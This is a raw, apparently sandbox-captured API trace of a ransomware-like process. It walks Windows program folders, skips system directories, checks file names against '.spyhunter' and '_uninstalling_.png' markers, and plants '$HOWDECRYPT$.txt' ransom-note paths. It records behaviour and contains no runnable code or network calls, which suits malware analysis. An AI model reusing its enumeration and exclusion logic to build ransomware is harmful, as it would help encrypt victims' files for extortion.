RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1660) returned 0x2c310e0 [0091.721] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.721] lstrcmpiW (lpString1="msado26.tlb", lpString2="Windows") returned -1 [0091.721] lstrlenW (lpString="Windows") returned 7 [0091.721] lstrcmpiW (lpString1="msado26.tlb", lpString2="$Recycle.bin") returned 1 [0091.721] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.721] lstrcmpiW (lpString1="msado26.tlb", lpString2="System Volume Information") returned -1 [0091.721] lstrlenW (lpString="System Volume Information") returned 25 [0091.721] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado26.tlb") returned 56 [0091.721] StrStrIW (lpFirst="msado26.tlb", lpSrch=".spyhunter") returned 0x0 [0091.721] lstrcmpW (lpString1="msado26.tlb", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.721] lstrcmpW (lpString1="msado26.tlb", lpString2="_uninstalling_.png") returned 1 [0091.721] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado26.tlb") returned 56 [0091.721] GetProcessHeap () returned 0x2c0000 [0091.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb2) returned 0x34ce18 [0091.722] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1668) returned 0x2c310e0 [0091.722] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.722] lstrcmpiW (lpString1="msado27.tlb", lpString2="Windows") returned -1 [0091.722] lstrlenW (lpString="Windows") returned 7 [0091.722] lstrcmpiW (lpString1="msado27.tlb", lpString2="$Recycle.bin") returned 1 [0091.722] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.722] lstrcmpiW (lpString1="msado27.tlb", lpString2="System Volume Information") returned -1 [0091.722] lstrlenW (lpString="System Volume Information") returned 25 [0091.722] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado27.tlb") returned 56 [0091.722] StrStrIW (lpFirst="msado27.tlb", lpSrch=".spyhunter") returned 0x0 [0091.722] lstrcmpW (lpString1="msado27.tlb", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.722] lstrcmpW (lpString1="msado27.tlb", lpString2="_uninstalling_.png") returned 1 [0091.722] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado27.tlb") returned 56 [0091.722] GetProcessHeap () returned 0x2c0000 [0091.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb2) returned 0x34ced8 [0091.722] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1670) returned 0x2c310e0 [0091.722] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.722] lstrcmpiW (lpString1="msado28.tlb", lpString2="Windows") returned -1 [0091.722] lstrlenW (lpString="Windows") returned 7 [0091.722] lstrcmpiW (lpString1="msado28.tlb", lpString2="$Recycle.bin") returned 1 [0091.722] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.722] lstrcmpiW (lpString1="msado28.tlb", lpString2="System Volume Information") returned -1 [0091.722] lstrlenW (lpString="System Volume Information") returned 25 [0091.722] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado28.tlb") returned 56 [0091.722] StrStrIW (lpFirst="msado28.tlb", lpSrch=".spyhunter") returned 0x0 [0091.723] lstrcmpW (lpString1="msado28.tlb", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.723] lstrcmpW (lpString1="msado28.tlb", lpString2="_uninstalling_.png") returned 1 [0091.723] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado28.tlb") returned 56 [0091.723] GetProcessHeap () returned 0x2c0000 [0091.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb2) returned 0x34cf98 [0091.723] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1678) returned 0x2c310e0 [0091.723] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.723] lstrcmpiW (lpString1="msadomd.dll", lpString2="Windows") returned -1 [0091.723] lstrlenW (lpString="Windows") returned 7 [0091.723] lstrcmpiW (lpString1="msadomd.dll", lpString2="$Recycle.bin") returned 1 [0091.723] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.723] lstrcmpiW (lpString1="msadomd.dll", lpString2="System Volume Information") returned -1 [0091.723] lstrlenW (lpString="System Volume Information") returned 25 [0091.723] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd.dll") returned 56 [0091.723] StrStrIW (lpFirst="msadomd.dll", lpSrch=".spyhunter") returned 0x0 [0091.723] lstrcmpW (lpString1="msadomd.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.723] lstrcmpW (lpString1="msadomd.dll", lpString2="_uninstalling_.png") returned 1 [0091.723] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd.dll") returned 56 [0091.723] GetProcessHeap () returned 0x2c0000 [0091.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb2) returned 0x34d058 [0091.723] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1680) returned 0x2c310e0 [0091.723] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.723] lstrcmpiW (lpString1="msadomd28.tlb", lpString2="Windows") returned -1 [0091.723] lstrlenW (lpString="Windows") returned 7 [0091.724] lstrcmpiW (lpString1="msadomd28.tlb", lpString2="$Recycle.bin") returned 1 [0091.724] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.724] lstrcmpiW (lpString1="msadomd28.tlb", lpString2="System Volume Information") returned -1 [0091.724] lstrlenW (lpString="System Volume Information") returned 25 [0091.724] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd28.tlb") returned 58 [0091.724] StrStrIW (lpFirst="msadomd28.tlb", lpSrch=".spyhunter") returned 0x0 [0091.724] lstrcmpW (lpString1="msadomd28.tlb", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.724] lstrcmpW (lpString1="msadomd28.tlb", lpString2="_uninstalling_.png") returned 1 [0091.724] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd28.tlb") returned 58 [0091.724] GetProcessHeap () returned 0x2c0000 [0091.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb6) returned 0x34d118 [0091.724] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1688) returned 0x2c310e0 [0091.724] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.724] lstrcmpiW (lpString1="msador15.dll", lpString2="Windows") returned -1 [0091.724] lstrlenW (lpString="Windows") returned 7 [0091.724] lstrcmpiW (lpString1="msador15.dll", lpString2="$Recycle.bin") returned 1 [0091.724] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.724] lstrcmpiW (lpString1="msador15.dll", lpString2="System Volume Information") returned -1 [0091.724] lstrlenW (lpString="System Volume Information") returned 25 [0091.724] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msador15.dll") returned 57 [0091.724] StrStrIW (lpFirst="msador15.dll", lpSrch=".spyhunter") returned 0x0 [0091.724] lstrcmpW (lpString1="msador15.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.724] lstrcmpW (lpString1="msador15.dll", lpString2="_uninstalling_.png") returned 1 [0091.724] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msador15.dll") returned 57 [0091.725] GetProcessHeap () returned 0x2c0000 [0091.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb4) returned 0x34d1d8 [0091.725] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1690) returned 0x2c310e0 [0091.725] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.725] lstrcmpiW (lpString1="msadox.dll", lpString2="Windows") returned -1 [0091.725] lstrlenW (lpString="Windows") returned 7 [0091.725] lstrcmpiW (lpString1="msadox.dll", lpString2="$Recycle.bin") returned 1 [0091.725] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.725] lstrcmpiW (lpString1="msadox.dll", lpString2="System Volume Information") returned -1 [0091.725] lstrlenW (lpString="System Volume Information") returned 25 [0091.728] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox.dll") returned 55 [0091.728] StrStrIW (lpFirst="msadox.dll", lpSrch=".spyhunter") returned 0x0 [0091.728] lstrcmpW (lpString1="msadox.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.728] lstrcmpW (lpString1="msadox.dll", lpString2="_uninstalling_.png") returned 1 [0091.729] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox.dll") returned 55 [0091.729] GetProcessHeap () returned 0x2c0000 [0091.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb0) returned 0x329e90 [0091.729] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1690) returned 0x2c310e0 [0091.729] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.729] lstrcmpiW (lpString1="msadox28.tlb", lpString2="Windows") returned -1 [0091.729] lstrlenW (lpString="Windows") returned 7 [0091.729] lstrcmpiW (lpString1="msadox28.tlb", lpString2="$Recycle.bin") returned 1 [0091.729] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.729] lstrcmpiW (lpString1="msadox28.tlb", lpString2="System Volume Information") returned -1 [0091.729] lstrlenW (lpString="System Volume Information") returned 25 [0091.729] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox28.tlb") returned 57 [0091.729] StrStrIW (lpFirst="msadox28.tlb", lpSrch=".spyhunter") returned 0x0 [0091.729] lstrcmpW (lpString1="msadox28.tlb", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.729] lstrcmpW (lpString1="msadox28.tlb", lpString2="_uninstalling_.png") returned 1 [0091.729] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox28.tlb") returned 57 [0091.729] GetProcessHeap () returned 0x2c0000 [0091.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb4) returned 0x34d298 [0091.730] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1698) returned 0x2c310e0 [0091.730] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.730] lstrcmpiW (lpString1="msadrh15.dll", lpString2="Windows") returned -1 [0091.730] lstrlenW (lpString="Windows") returned 7 [0091.730] lstrcmpiW (lpString1="msadrh15.dll", lpString2="$Recycle.bin") returned 1 [0091.730] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.730] lstrcmpiW (lpString1="msadrh15.dll", lpString2="System Volume Information") returned -1 [0091.730] lstrlenW (lpString="System Volume Information") returned 25 [0091.730] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadrh15.dll") returned 57 [0091.730] StrStrIW (lpFirst="msadrh15.dll", lpSrch=".spyhunter") returned 0x0 [0091.730] lstrcmpW (lpString1="msadrh15.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.730] lstrcmpW (lpString1="msadrh15.dll", lpString2="_uninstalling_.png") returned 1 [0091.730] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadrh15.dll") returned 57 [0091.730] GetProcessHeap () returned 0x2c0000 [0091.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb4) returned 0x34d358 [0091.730] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x16a0) returned 0x2c310e0 [0091.730] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0 [0091.730] FindClose (in: hFindFile=0x335f60 | out: hFindFile=0x335f60) returned 1 [0091.814] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\$HOWDECRYPT$.txt") returned 61 [0091.814] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\$HOWDECRYPT$.txt") returned 61 [0091.814] GetProcessHeap () returned 0x2c0000 [0091.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xbc) returned 0x32d5b8 [0091.814] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1590) returned 0x2c310e0 [0091.814] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0091.814] lstrcmpiW (lpString1="DirectDB.dll", lpString2="Windows") returned -1 [0091.814] lstrlenW (lpString="Windows") returned 7 [0091.814] lstrcmpiW (lpString1="DirectDB.dll", lpString2="$Recycle.bin") returned 1 [0091.815] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.815] lstrcmpiW (lpString1="DirectDB.dll", lpString2="System Volume Information") returned -1 [0091.815] lstrlenW (lpString="System Volume Information") returned 25 [0091.815] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\DirectDB.dll") returned 53 [0091.815] StrStrIW (lpFirst="DirectDB.dll", lpSrch=".spyhunter") returned 0x0 [0091.815] lstrcmpW (lpString1="DirectDB.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.815] lstrcmpW (lpString1="DirectDB.dll", lpString2="_uninstalling_.png") returned 1 [0091.815] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\DirectDB.dll") returned 53 [0091.815] GetProcessHeap () returned 0x2c0000 [0091.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xac) returned 0x329dd8 [0091.815] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1598) returned 0x2c310e0 [0091.815] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0091.815] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0091.815] lstrlenW (lpString="Windows") returned 7 [0091.815] lstrcmpiW (lpString1="en-US", lpString2="$Recycle.bin") returned 1 [0091.815] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.815] lstrcmpiW (lpString1="en-US", lpString2="System Volume Information") returned -1 [0091.815] lstrlenW (lpString="System Volume Information") returned 25 [0091.815] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US") returned 46 [0091.815] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0091.815] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0091.815] GetProcessHeap () returned 0x2c0000 [0091.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x30efc0 [0091.815] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\*") returned 48 [0091.816] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\*", lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0x335f60 [0091.816] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.816] lstrlenW (lpString="Windows") returned 7 [0091.816] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.816] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.816] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.816] lstrlenW (lpString="System Volume Information") returned 25 [0091.816] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\.") returned 48 [0091.816] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.816] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.816] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.816] lstrlenW (lpString="Windows") returned 7 [0091.816] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.816] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.816] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.816] lstrlenW (lpString="System Volume Information") returned 25 [0091.816] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\..") returned 49 [0091.816] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.817] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.817] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.817] lstrcmpiW (lpString1="wab32res.dll.mui", lpString2="Windows") returned -1 [0091.817] lstrlenW (lpString="Windows") returned 7 [0091.817] lstrcmpiW (lpString1="wab32res.dll.mui", lpString2="$Recycle.bin") returned 1 [0091.817] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.817] lstrcmpiW (lpString1="wab32res.dll.mui", lpString2="System Volume Information") returned 1 [0091.817] lstrlenW (lpString="System Volume Information") returned 25 [0091.817] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\wab32res.dll.mui") returned 63 [0091.817] StrStrIW (lpFirst="wab32res.dll.mui", lpSrch=".spyhunter") returned 0x0 [0091.817] lstrcmpW (lpString1="wab32res.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.817] lstrcmpW (lpString1="wab32res.dll.mui", lpString2="_uninstalling_.png") returned 1 [0091.817] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\wab32res.dll.mui") returned 63 [0091.817] GetProcessHeap () returned 0x2c0000 [0091.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc0) returned 0x32d680 [0091.817] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15a0) returned 0x2c310e0 [0091.817] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0 [0091.817] FindClose (in: hFindFile=0x335f60 | out: hFindFile=0x335f60) returned 1 [0091.817] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\$HOWDECRYPT$.txt") returned 63 [0091.817] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\$HOWDECRYPT$.txt") returned 63 [0091.817] GetProcessHeap () returned 0x2c0000 [0091.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc0) returned 0x32d748 [0091.818] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15a8) returned 0x2c310e0 [0091.818] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0091.818] lstrcmpiW (lpString1="msadc", lpString2="Windows") returned -1 [0091.818] lstrlenW (lpString="Windows") returned 7 [0091.818] lstrcmpiW (lpString1="msadc", lpString2="$Recycle.bin") returned 1 [0091.818] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.818] lstrcmpiW (lpString1="msadc", lpString2="System Volume Information") returned -1 [0091.818] lstrlenW (lpString="System Volume Information") returned 25 [0091.818] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc") returned 46 [0091.818] lstrcmpW (lpString1="msadc", lpString2=".") returned 1 [0091.818] lstrcmpW (lpString1="msadc", lpString2="..") returned 1 [0091.818] GetProcessHeap () returned 0x2c0000 [0091.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x30efc0 [0091.818] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*") returned 48 [0091.818] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*", lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0x335f60 [0091.851] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.851] lstrlenW (lpString="Windows") returned 7 [0091.851] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.851] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.851] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.851] lstrlenW (lpString="System Volume Information") returned 25 [0091.851] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\.") returned 48 [0091.851] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.851] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.851] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.851] lstrlenW (lpString="Windows") returned 7 [0091.851] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.851] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.851] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.851] lstrlenW (lpString="System Volume Information") returned 25 [0091.851] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\..") returned 49 [0091.851] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.851] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.851] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.851] lstrcmpiW (lpString1="adcjavas.inc", lpString2="Windows") returned -1 [0091.851] lstrlenW (lpString="Windows") returned 7 [0091.852] lstrcmpiW (lpString1="adcjavas.inc", lpString2="$Recycle.bin") returned 1 [0091.852] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.852] lstrcmpiW (lpString1="adcjavas.inc", lpString2="System Volume Information") returned -1 [0091.852] lstrlenW (lpString="System Volume Information") returned 25 [0091.852] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 59 [0091.852] StrStrIW (lpFirst="adcjavas.inc", lpSrch=".spyhunter") returned 0x0 [0091.852] lstrcmpW (lpString1="adcjavas.inc", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.852] lstrcmpW (lpString1="adcjavas.inc", lpString2="_uninstalling_.png") returned 1 [0091.852] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 59 [0091.852] GetProcessHeap () returned 0x2c0000 [0091.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb8) returned 0x34d058 [0091.852] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1590) returned 0x2c310e0 [0091.852] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.852] lstrcmpiW (lpString1="adcvbs.inc", lpString2="Windows") returned -1 [0091.852] lstrlenW (lpString="Windows") returned 7 [0091.852] lstrcmpiW (lpString1="adcvbs.inc", lpString2="$Recycle.bin") returned 1 [0091.852] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.852] lstrcmpiW (lpString1="adcvbs.inc", lpString2="System Volume Information") returned -1 [0091.852] lstrlenW (lpString="System Volume Information") returned 25 [0091.852] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc") returned 57 [0091.852] StrStrIW (lpFirst="adcvbs.inc", lpSrch=".spyhunter") returned 0x0 [0091.852] lstrcmpW (lpString1="adcvbs.inc", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.852] lstrcmpW (lpString1="adcvbs.inc", lpString2="_uninstalling_.png") returned 1 [0091.853] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc") returned 57 [0091.853] GetProcessHeap () returned 0x2c0000 [0091.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb4) returned 0x34c8d8 [0091.853] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1598) returned 0x2c310e0 [0091.853] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.853] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0091.853] lstrlenW (lpString="Windows") returned 7 [0091.853] lstrcmpiW (lpString1="en-US", lpString2="$Recycle.bin") returned 1 [0091.853] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.853] lstrcmpiW (lpString1="en-US", lpString2="System Volume Information") returned -1 [0091.853] lstrlenW (lpString="System Volume Information") returned 25 [0091.853] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US") returned 52 [0091.853] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0091.853] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0091.853] GetProcessHeap () returned 0x2c0000 [0091.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0091.854] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*") returned 54 [0091.854] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0091.900] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.900] lstrlenW (lpString="Windows") returned 7 [0091.900] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.900] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.900] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.900] lstrlenW (lpString="System Volume Information") returned 25 [0091.900] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\.") returned 54 [0091.900] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.900] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.900] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.900] lstrlenW (lpString="Windows") returned 7 [0091.900] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.900] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.900] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.900] lstrlenW (lpString="System Volume Information") returned 25 [0091.900] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common 